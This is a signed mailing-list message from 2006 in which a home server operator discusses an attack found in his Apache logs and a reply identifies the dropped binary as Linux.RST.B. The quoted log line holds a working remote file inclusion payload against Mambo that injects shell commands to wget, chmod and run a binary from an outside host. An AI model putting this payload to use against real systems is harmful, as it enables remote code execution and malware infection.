-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Edward Shornock schrieb: > > On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote: > > Hi, > > > > yesterday morning I found a strange entry in my apache log files (debian > > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan > > Server, just serving my Family and some good friends (normally). > > > > ---cut--- > > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET > > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20 > > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo| > > HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" > > ---cut--- > > > > As I patched mambo against recent "register global" attack and my /tmp > > is mount noexec, the attack doesn't exploit anything. > > > > However, I curiously downloaded this sexy executable to have a closer look. > > > > ---cut--- > > backup:/home/qmb# ./sexy -h > > ./sexy <host> <port> > > ---cut--- > > > Never run apps like this as root. Bad bad idea.
There is an old saying in Germany: "Only damage will make you wise" In spite the box where I tried was on the second line and I did not pass any arguments (IP/port) to the tool, I see the chance that it would have polluted the whole LAN and probably even find a way to the outside, now. Thanks god it wasn't that evil, so the knoppix restore could fix the situation. > If you want more information about this tool, google for "Linux.RST.B" > or "Unix/RST.B". Thank you very much. - -- - - maik -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFD1LDZz3bq6aadmI8RAj/fAJ93fsZEUSRiPNRGUqs7Q7t6pDOF8wCeK1Tn LzAJkhxI+Kfs5njhvwZ/Xio= =3tRt -----END PGP SIGNATURE----- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
